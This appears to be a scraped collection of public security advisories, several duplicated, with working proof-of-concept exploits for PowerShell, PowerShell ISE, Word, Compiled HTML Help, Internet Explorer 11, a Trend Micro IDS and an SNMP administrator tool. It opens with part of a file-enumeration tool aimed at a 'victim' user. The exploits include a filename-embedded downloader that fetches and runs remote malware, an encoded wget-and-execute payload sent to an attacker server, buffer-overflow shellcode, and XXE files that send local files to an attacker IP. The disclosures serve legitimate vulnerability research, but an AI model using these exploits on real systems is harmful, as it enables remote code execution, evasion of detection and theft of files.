"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"] APPDATA_DIR=["AppData/Local/Temp"] EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat", ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"]) REPORT="NtFileSins_Log.txt" def usage(): print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n" print '-u victim -d Searches -a "MS17-020 - Google Search.url"' print '-u victim -a ""' print "-u victim -d Downloads -a -s" print '-u victim -d Contacts -a "Mike N.contact"' print "-u victim -a APT.txt -b -n" print "-u victim -d -z Desktop/MyFiles -a <.name>" print "-u victim -d Searches -a .search-ms" print "-u victim -d . -a " print "-u victim -d desktop -a inverted-crosses.mp3 -b" print "-u victim -d Downloads -a APT.exe -b" print "-u victim -f list_of_files.txt" print "-u victim -f list_of_files.txt -b -s" print "-u victim -f list_of_files.txt -x .txt" print "-u victim -d desktop -f list_of_files.txt -b" print "-u victim -d desktop -f list_of_files.txt -x .rar" print "-u victim -z -s -f list_of_files.txt" def parse_args(): parser.add_argument("-u", "--user", help="Privileged user target") parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .") parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.") parser.add_argument("-t", "--appdata", nargs="?",
Microsoft Windows PowerShell Unsanitized Filename Command Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt [+] ISR: Apparition Security [Vendor] www.microsoft.com [Product] Windows PowerShell Windows PowerShell is a Windows command-line shell designed especially for system administrators. PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination. [Vulnerability Type] Unsanitized Filename Command Execution [CVE Reference] N/A [Security Issue] PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames. This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file; or the running of unexpected commands straight from the filename itself without the need for a second file. For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf. Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script. However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working. Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell. My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant. Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest) abbreviated for space then it sleeps for 2 seconds and finally executes. C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'")) This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed. We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are commands can be stored. For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files. First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe". c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'")) Give the PS script a normal begining name, then separate commands using ";" semicolon e.g. Test;powershell -e ;2.ps1 Create the executable without a file extension to save space for the filename then save it back using the -O parameter. The "-e" is abbreviated for EncodedCommand to again save filename space. Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever. Double click to open in PowerShell watch the file get downloaded saved and executed! My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory. Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string! [Exploit / PoC] from base64 import b64encode import argparse,sys #Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC #Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename. #Expects hostname/ip-addr of web-server housing the exploit. #By hyp3rlinx #Apparition Security # def parse_args(): parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.") parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.") parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.") return parser.parse_args() def main(args): PSEmbedFilenameMalwr="" if args.ipaddress: PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start
Trend Micro Deep Discovery Inspector IDS / Percent Encoding IDS Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt [+] ISR: Apparition Security [Vendor] www.trendmicro.com [Product] Deep Discovery Inspector Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C) communications, and evasive attacker activities that are invisible to standard security defenses. [Vulnerability Type] Percent Encoding IDS Bypass [CVE Reference] Vendor decided not to release a CVE [Security Issue] Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection" and they will be flagged as high. Attacker payloads sent with normal ascii characters for example like "wget" or even if they have been HEX encoded like "\x77\x67\x65\x74" they will still get flagged and alerted on. However, attackers can easily bypass these alerts by sending malicious commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74" which also translates to "wget" and will not get flagged or alerted on and may still be processed on the target system. e.g. DDI RULE 2452 https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452 Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is still run by the vulnerable target if the payload is encoded using percent/hex encoding like %77%67%65%74. That will not only bypass the IDE by having no alert triggered or notification sent but the application will still process the malicious command. Importantly, the "wget" DDI Rule 2452 used is just an example and can potentially be any malicious request where the IDS checks the character encodings but fails to account for percent encoded HEX character payload values. [Exploit/POC] from socket import * #Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC #Discovery: hyp3rlinx - ApparitionSec #Apparition Security #Firewall Rule Bypass IP = raw_input("[+] Trend Micro IDS") PORT = 80 payload="/index.php?s=/index/vulnerable/app/invoke=call_user_func_array[0]=system[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n" s=socket(AF_INET, SOCK_STREAM) s.connect((IP, PORT)) s.send(req) res="" while True: res = s.recv(512) print res if res=="\n" or "": break s.close() #Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered. [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: May 14, 2019 Vendor confirmed the IDS Bypass: May 20, 2019 Vendor informed that a DDI IDS enhancement has been made: July 18, 2019 July 23, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
CVE-2019-13577 / MAPLE Computer WBT SNMP Administrator v2.0.195.15 / Unauthenticated Remote Buffer Overflow Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt [+] ISR: Apparition Security [Vendor] www.computerlab.com [Product] MAPLE Computer WBT SNMP Administrator (Thin Client Administrator) v2.0.195.15 https://www.computerlab.com/index.php/downloads/category/27-device-manager ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE SnmpSetup.195.15.EXE MD5 File Hash: a3913aae166c11ddd21dca437e78c3f4 The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients. This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol). Agents are built into the clients for remote management and configuration. [Vulnerability Type] Unauthenticated Remote Buffer Overflow Code Execution 0day [CVE Reference] CVE-2019-13577 [Security Issue] SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987. This will overwrite data on the stack/registers and allow for control of the programs execution flow resulting in attacker supplied remote code execution. Authentication is not required for this exploit. This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code. When installing the vulnerable program if asks for a serial number just enter a value of "1" or something. Upon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin. Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp directory, make OS system files viewable in explorer to see them. e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp ASLR / SEH are all set to False which help to make exploitation more portable. CALL EBX 10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll) Stack dump: EAX 41414141 ECX 0018FEFC EDX 0018FF10 EBX 022DDA78 ASCII "AAA ESP 0018FECC EBP 0018FEF4 ESI 0018FF10 EDI 0018FEFC EIP 41414141 C 0 ES 002B 32bit 0() P 1 CS 0023 32bit 0() A 0 SS 002B 32bit 0() Z 0 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr ERROR_NO_SCROLLBARS (05A7) EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G) [Exploit/POC] from socket import * import struct,sys,argparse #MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15 #CVE-2019-13577 #Remote Buffer Overflow 0day #hyp3rlinx - ApparitionSec #Pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") eip = struct.pack(" 1: print "[*] No args supplied see Help -h" exit() main(parse_args()) [POC Video URL] https://www.youtube.com/watch?v=THMqueCIrFw [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: July 10, 2019 Second vendor notification attempt: July 13, 2019 No vendor replies. July 17, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
[**Fixed Typo] Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Compiled HTML Help "hh.exe" Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program. [Vulnerability Type] Uncompiled .CHM File XML External Entity Injection [CVE Reference] N/A [Security Issue] CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc. Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files. Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods. While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process. Note: User interaction is required to exploit this vulnerability. [Exploit/POC] 1) python -m SimpleHTTPServer 2) "XXE.chm.chm" Uncompiled CHM File XXE PoC http://localhost:81/payload.dtd;> %dtd;]> 3) "payload.dtd" (hosted in python web-server dir port 81 above) http://localhost:81?%file;'>"> %all; Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC. Tested successfully Windows 7/10 [POC Video URL] https://www.youtube.com/watch?v=iaxp1iBDWXY [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: April 25, 2019 MSRC Response: "We determined that this behavior is considered to be by design" July 16, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Compiled HTML Help "hh.exe" Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program. [Vulnerability Type] Uncompiled .CHM File XML External Entity Injection [CVE Reference] N/A [Security Issue] CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc. Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files. Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods. While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process. Note: User interaction is required to exploit this vulnerability. [Exploit/POC] 1) python -m SimpleHTTPServer 2) "XXE.chm.chm" Uncompiled CHM File XXE PoC http://localhost:81/payload.dtd;> %dtd;]> 3) "payload.dtd" (hosted in python web-server dir port 8000 above) http://localhost:81?%file;'>"> %all; Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC. Tested successfully Windows 7/10 [POC Video URL] https://www.youtube.com/watch?v=iaxp1iBDWXY [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: April 25, 2019 MSRC Response: "We determined that this behavior is considered to be by design" July 16, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Microsoft Word (2016) Deceptive File Reference ZDI-CAN-7949
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WORD-DECEPTIVE-FILE-REFERENCE.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] Microsoft Word 2016 [Vulnerability Type] Deceptive File Reference [References] ZDI-CAN-7949 [Security Issue] When a MS Word ".docx" File contains a hyperlink to another file, it will run the first file it finds in that directory with a valid extension. But will present to the end user an extension-less file in its Security warning dialog box without showing the extension type. If another "empty" file of the same name as the target executable exists but has no file extension. Because the extension is supressed it makes the file seem harmless and the file can be masked to appear as just a folder etc. This can potentially trick user into running unexpected code, but will only work when you have an additional file of same name with NO extension on it. [Exploit/POC] 1) Create a directory "PoC" 2) Create a folder in PoC directory named "Downloads Folder" 3) Create a .BAT file named "Downloads Folder.bat" in the .BAT create some command like "start calc.exe" 4) Create an empty file named "Downloads Folder" with no file extension 5) Create the Word ".docx" file with a hyperlink pointing to "PoC/Downloads Folder/Downloads Folder" Upon opening the link Word will give user an vague dialog box about asking if they want to open the file. However, the prompt shows an apparent folder structure and no file extension .exe, .com etc are visible or displayed to the end user. Click the link to open what looks to be a folder then BOOM! the .BAT file runs instead. Of course any exeuctable will do .EXE etc. [Network Access] Local [Severity] High [POC Video URL] https://www.youtube.com/watch?v=irxkV_qGG9Y [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program : 2019-01-25 Case officially contracted to ZDI : 2019-02-06 Vendor Disclosure : 2019-02-15 submitted to the vendor as ZDI-CAN-7949. ZDI Response : "We have synced with the vendor and they have resolved that this case does not meet the bar for security servicing. Therefore we will proceed to close it on our end." 2019-06-14 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] Windows PowerShell ISE The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell. In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface. [Vulnerability Type] Filename Parsing Flaw Remote Code Execution 0day [References] ZDI-CAN-8005 [Security Issue] Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of PowerShell ISE allowing potential unexpected remote code execution. In PowerShell brackets are used to access array elements. PS C:\> $a=1..10 PS C:\> $a[4] 5 However, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file. That file must contain a single matching char value which is also found in our specially crafted filename. Requirements are both files must reside in the same directory. Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a file named 1.ps1 it will create a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L". Other things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols. PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application. These chars also get the job done: "$" "_" "#" "^" plus any single case insensitive letter a-z or numbers 0-9, [Hello_World].ps1 > _.ps1 [Hello].ps1 will execute this instead => h.ps1 Dashes "-" throw the following error: "The specified wildcard character pattern is not valid: [Hello-World].ps1" when pointing to another PS file named -.ps1 and seems to treat it sort of like a meta-character. [pw3d].ps1 <= expected to execute 3.ps1 <= actually executed This exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display "trusted" code in ISE that is expected to run. However, when the user debugs the script a different script gets executed. Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss. User interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous. Again, this exploit takes advantage of "trust" where users can see and read the code and will trust it as everything looks just fine and yet ... still they get PWNED!. Tested successfully on Win7/10 Long live user interaction! lol... [POC Video URL] https://www.youtube.com/watch?v=T2I_-iUPaFw [Exploit/POC] After opening PS files in ISE, set the execution policy so can test without issues. set-executionpolicy unrestricted -force PS scripts over Network shares may get 'RemoteSigned' security policy issue so run below cmd. set-executionpolicy unrestricted -force process Choose 'R' to run once. Below Python script will create two .ps1 files to demonstrate the vulnerable condition. Examine the code, what does it say? it reads... Write-output "Hello World!"... now Run it... BAM! other PS script executes!. #PowerShell ISE 0day Xploit #ZDI-CAN-8005 #ZDI CVSS: 7.0 #hyp3rlinx #ApparitionSec fname1="[HelloWorldTutoria1].ps1"#Expected code to run is 'HelloWorld!' fname2="1.ps1" #Actual code executed is calc.exe for Poc evil_code="start calc.exe" #Edit to suit your needs. c=0 payload1='Write-Output "Hello World!"' payload2=evil_code+"\n"+'Write-Output "Hello World!"' def mk_ps_hijack_script(): global c c+=1 f=open(globals()["fname"+str(c)],"wb") f.write(globals()["payload"+str(c)]) f.close() if c<2: mk_ps_hijack_script() if __name__=="__main__": mk_ps_hijack_script() print "PowerShell ISE Xploit 0day Files Created!" print "Discovery by hyp3rlinx" print "ZDI-CAN-8005" [Network Access] Remote [Severity] High [Disclosure Timeline] ZDI Case opened : 2019-02-06
[**UPDATED] Microsoft Internet Explorer v11 / XML External Entity Injection 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Internet Explorer v11 (latest version) Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. [Vulnerability Type] XML External Entity Injection [CVE Reference] N/A [Security Issue] Internet Explorer is vulnerable to XML External Entity attack if a user opens a specially crafted .MHT file locally. This can allow remote attackers to potentially exfiltrate Local files and conduct remote reconnaissance on locally installed Program version information. Example, a request for "c:\Python27\NEWS.txt" can return version information for that program. Upon opening the malicious ".MHT" file locally it should launch Internet Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K" and other interactions like right click "Print Preview" or "Print" commands on the web-page may also trigger the XXE vulnerability. However, a simple call to the window.print() Javascript function should do the trick without requiring any user interaction with the webpage. Importantly, if files are downloaded from the web in a compressed archive and opened using certain archive utilities MOTW may not work as advertised. Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" users will get a security warning bar in IE and be prompted to activate blocked content. However, when opening a specially crafted .MHT file using malicious markup tags the user will get no such active content or security bar warnings. e.g. C:\sec>python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 - 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 - Tested successfully in latest Internet Explorer Browser v11 with latest security patches on Win7/10 and Server 2012 R2. [POC/Video URL] https://www.youtube.com/watch?v=fbLNbCjgJeY [Exploit/POC] POC to exfil Windows "system.ini" file. Note: Edit attacker server IP in the script to suit your needs. 1) Use below script to create the "datatears.xml" XML and XXE embedded "msie-xxe-0day.mht" MHT file. 2) python -m SimpleHTTPServer 3) Place the generated "datatears.xml" in Python server web-root. 4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated. #Microsoft Internet Explorer XXE 0day #Creates malicious XXE .MHT and XML files #Open the MHT file in MSIE locally, should exfil system.ini #By hyp3rlinx #ApparitionSec ATTACKER_IP="localhost" PORT="8000" mht_file=( 'From:\n' 'Subject:\n' 'Date:\n' 'MIME-Version: 1.0\n' 'Content-Type: multipart/related; type="text/html";\n' '\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n' 'This is a multi-part message in MIME format.\n\n\n' '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n' 'Content-Type: text/html; charset="UTF-8"\n' 'Content-Location: main.htm\n\n' 'http://www.w3.org/TR/html4/transitional.dtd;>\n' '\n' '\n' '\n' 'MSIE XXE 0day\n' '\n' '\n' '\n' '\n' '\n' '\n' '%sp;\n' '%param1;\n' ']>\n' '\n' '\n' '\n' '\n' '\n' 'window.print();\n' '\n' '\n' '\n' 'MSIE XML External Entity 0day PoC.\n' 'Discovery: hyp3rlinx\n' 'ApparitionSec\n' '\n' '\n' '\n' '\n' '\n\n\n' '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--' ) xml_file=( '\n' '">\n' '\n' '">\n' ) def mk_msie_0day_filez(f,p): f=open(f,"wb") f.write(p) f.close() if __name__ == "__main__": mk_msie_0day_filez("msie-xxe-0day.mht",mht_file) mk_msie_0day_filez("datatears.xml",xml_file) print "Microsoft Internet Explorer XML External Entity 0day PoC." print "Files msie-xxe-0day.mht and datatears.xml Created!." print "Discovery: Hyp3rlinx / Apparition Security" [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: March 27, 2019 Vendor acknowledgement: March 27, 2019 Case Opened: March 28, 2019 MSRC reponse April 10, 2019: "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case." April 10,
Microsoft Internet Explorer v11 XML External Entity Injection 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Internet Explorer v11 (latest version) Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. [Vulnerability Type] XML External Entity Injection [CVE Reference] N/A [Security Issue] Internet Explorer is vulnerable to XML External Entity attack if a user opens a specially crafted .MHT file locally. This can allow remote attackers to potentially exfiltrate Local files and conduct remote reconnaissance on locally installed Program version information. Example, a request for "c:\Python27\NEWS.txt" can return version information for that program. Upon opening the malicious ".MHT" file locally it should launch Internet Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K" and other interactions like right click "Print Preview" or "Print" commands on the web-page may also trigger the XXE vulnerability. However, a simple call to the window.print() Javascript function should do the trick without requiring any user interaction with the webpage. Importantly, if files are downloaded from the web in a compressed archive and opened using certain archive utilities MOTW may not work as advertised. Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" users will get a security warning bar in IE and be prompted to activate blocked content. However, when opening a specially crafted .MHT file using malicious markup tags the user will get no such active content or security bar warnings. e.g. C:\sec>python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 - 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 - Tested successfully in latest Internet Explorer Browser v11 with latest security patches on Win7/10 and Server 2012 R2. [POC/Video URL] https://vimeo.com/329717404 [Exploit/POC] POC to exfil Windows "system.ini" file. Note: Edit attacker server IP in the script to suit your needs. 1) Use below script to create the "datatears.xml" XML and XXE embedded 